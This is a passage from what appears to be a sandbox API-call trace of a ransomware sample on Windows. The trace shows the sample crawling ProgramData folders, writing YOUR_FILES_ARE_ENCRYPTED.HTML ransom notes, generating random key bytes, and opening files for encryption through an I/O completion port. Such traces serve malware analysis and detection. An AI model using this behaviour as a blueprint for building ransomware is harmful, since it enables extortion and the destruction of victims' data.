Defender\\Support\\MpWppTracing-02112021-124618-00000003-ffffffff.bin" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MpWppTracing-02112021-124618-00000003-ffffffff.bin") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MpWppTracing-02112021-124618-00000003-ffffffff.bin" [0107.855] CreateIoCompletionPort (FileHandle=0x30c, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0107.855] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0107.855] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82987280, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x82987280, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8431498e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="MpWppTracing-02112021-124618-00000003-ffffffff.bin", cAlternateFileName="MPWPPT~3.BIN")) returned 0 [0107.856] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0107.856] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 83 [0107.856] GetProcessHeap () returned 0x600000 [0107.856] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6aa4b0 [0107.856] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0107.857] WriteFile (in: hFile=0x31c, lpBuffer=0x6aa4b0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6aa4b0*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0107.858] CloseHandle (hObject=0x31c) returned 1 [0107.860] GetProcessHeap () returned 0x600000 [0107.860] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6aa4b0 | out: hHeap=0x600000) returned 1 [0107.860] GetProcessHeap () returned 0x600000 [0107.860] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0107.860] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x82987280, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x82987280, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="Support", cAlternateFileName="")) returned 0 [0107.860] FindClose (in: hFindFile=0x6266b8 | out: hFindFile=0x6266b8) returned 1 [0107.860] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0107.860] GetProcessHeap () returned 0x600000 [0107.860] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6aa4b0 [0107.861] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0107.861] WriteFile (in: hFile=0x304, lpBuffer=0x6aa4b0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6aa4b0*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0107.862] CloseHandle (hObject=0x304) returned 1 [0107.863] GetProcessHeap () returned 0x600000 [0107.863] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6aa4b0 | out: hHeap=0x600000) returned 1 [0107.863] GetProcessHeap () returned 0x600000 [0107.863] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0107.865] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3731a3a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3731a3a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="Windows Live", cAlternateFileName="WINDOW~2")) returned 1 [0107.865] StrStrIW (lpFirst="Windows Live", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.865] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Live") returned 41 [0107.865] GetProcessHeap () returned 0x600000 [0107.865] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0107.933] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Live" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Live") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Live" [0107.933] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Live", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Live\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Live\\*" [0107.934] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Live\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3731a3a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3731a3a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0107.934] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3731a3a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3731a3a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="..", cAlternateFileName="")) returned 1 [0107.934] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3731a3a, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x973af366, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x973af366, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1231, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="WLive48x48.png", cAlternateFileName="WLIVE4~1.PNG")) returned 1 [0107.934] StrStrIW (lpFirst="WLive48x48.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.934] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Live\\WLive48x48.png") returned 56 [0107.934] PathFindExtensionW (pszPath="WLive48x48.png") returned=".png" [0107.934] lstrlenW (lpString=".png") returned 4 [0107.934] PathFindExtensionW (pszPath="WLive48x48.png") returned=".png" [0107.934] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0107.934] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Live\\WLive48x48.png" (normalized: "c:\\programdata\\microsoft\\windows live\\wlive48x48.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0107.935] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=4657) returned 1 [0107.935] GetProcessHeap () returned 0x600000 [0107.935] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x313b008 [0107.939] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="0B") returned 2 [0107.939] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="A7") returned 2 [0107.939] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="77") returned 2 [0107.939] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="61") returned 2 [0107.939] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="61") returned 2 [0107.939] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="BA") returned 2 [0107.939] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="CF") returned 2 [0107.939] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="35") returned 2 [0107.939] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="1E") returned 2 [0107.939] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="19") returned 2 [0107.939] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="EB") returned 2 [0107.939] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="9E") returned 2 [0107.939] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="8B") returned 2 [0107.939] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="B5") returned 2 [0107.939] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="44") returned 2 [0107.939] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="CB") returned 2 [0107.939] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="53") returned 2 [0107.939] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="1E") returned 2 [0107.939] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="AC") returned 2 [0107.939] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="34") returned 2 [0107.939] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="26") returned 2 [0107.939] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="81") returned 2 [0107.939] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="BD") returned 2 [0107.939] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="97") returned 2 [0107.939] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="DC") returned 2 [0107.939] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="C3") returned 2 [0107.939] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="9B") returned 2 [0107.939] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="AB") returned 2 [0107.940] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="5D") returned 2 [0107.940] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="6C") returned 2 [0107.940] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="6D") returned 2 [0107.940] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="69") returned 2 [0107.940] lstrcpyW (in: lpString1=0x314b0bc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Live\\WLive48x48.png" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Live\\WLive48x48.png") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Live\\WLive48x48.png" [0107.940] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x313b008, NumberOfConcurrentThreads=0x0) returned 0x274 [0107.941] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x313b008, lpOverlapped=0x313b008) returned 1 [0107.941] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3731a3a, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x973af366, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x973af366, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1231, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="WLive48x48.png", cAlternateFileName="WLIVE4~1.PNG")) returned 0 [0107.941] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0107.943] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Live\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 71 [0107.943] GetProcessHeap () returned 0x600000 [0107.943] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3163dd0 [0107.944] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Live\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows live\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0107.944] WriteFile (in: hFile=0x30c, lpBuffer=0x3163dd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x3163dd0*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0107.945] CloseHandle (hObject=0x30c) returned 1 [0107.946] GetProcessHeap () returned 0x600000 [0107.946] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0107.946] GetProcessHeap () returned 0x600000 [0107.946] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0107.948] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="Windows NT", cAlternateFileName="WINDOW~3")) returned 1 [0107.948] StrStrIW (lpFirst="Windows NT", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.948] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT") returned 39 [0107.948] GetProcessHeap () returned 0x600000 [0107.948] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0107.949] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT" [0107.949] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\*" [0107.949] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0107.949] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="..", cAlternateFileName="")) returned 1 [0107.949] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="MSFax", cAlternateFileName="")) returned 1 [0107.949] StrStrIW (lpFirst="MSFax", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.949] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax") returned 45 [0107.949] GetProcessHeap () returned 0x600000 [0107.950] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0107.951] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax" [0107.951] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*" [0107.951] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0x1c88395, cFileName=".", cAlternateFileName="")) returned 0x626838 [0107.952] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0x1c88395, cFileName="..", cAlternateFileName="")) returned 1 [0107.952] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0x1c88395, cFileName="ActivityLog", cAlternateFileName="ACTIVI~1")) returned 1 [0107.952] StrStrIW (lpFirst="ActivityLog", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.952] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog") returned 57 [0107.952] GetProcessHeap () returned 0x600000 [0107.952] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0107.953] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog" [0107.953] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*" [0107.953] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c74c, dwReserved1=0x63c6f0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0107.953] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c74c, dwReserved1=0x63c6f0, cFileName="..", cAlternateFileName="")) returned 1 [0107.954] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c74c, dwReserved1=0x63c6f0, cFileName="..", cAlternateFileName="")) returned 0 [0107.954] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0107.954] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0107.954] GetProcessHeap () returned 0x600000 [0107.954] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0107.954] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\activitylog\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0107.955] WriteFile (in: hFile=0x32c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0107.956] CloseHandle (hObject=0x32c) returned 1 [0107.957] GetProcessHeap () returned 0x600000 [0107.957] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0107.957] GetProcessHeap () returned 0x600000 [0107.957] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0107.957] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0x1c88395, cFileName="Common Coverpages", cAlternateFileName="COMMON~1")) returned 1 [0107.957] StrStrIW (lpFirst="Common Coverpages", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.957] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages") returned 63 [0107.957] GetProcessHeap () returned 0x600000 [0107.957] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0107.957] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages" [0107.957] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*" [0107.957] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, 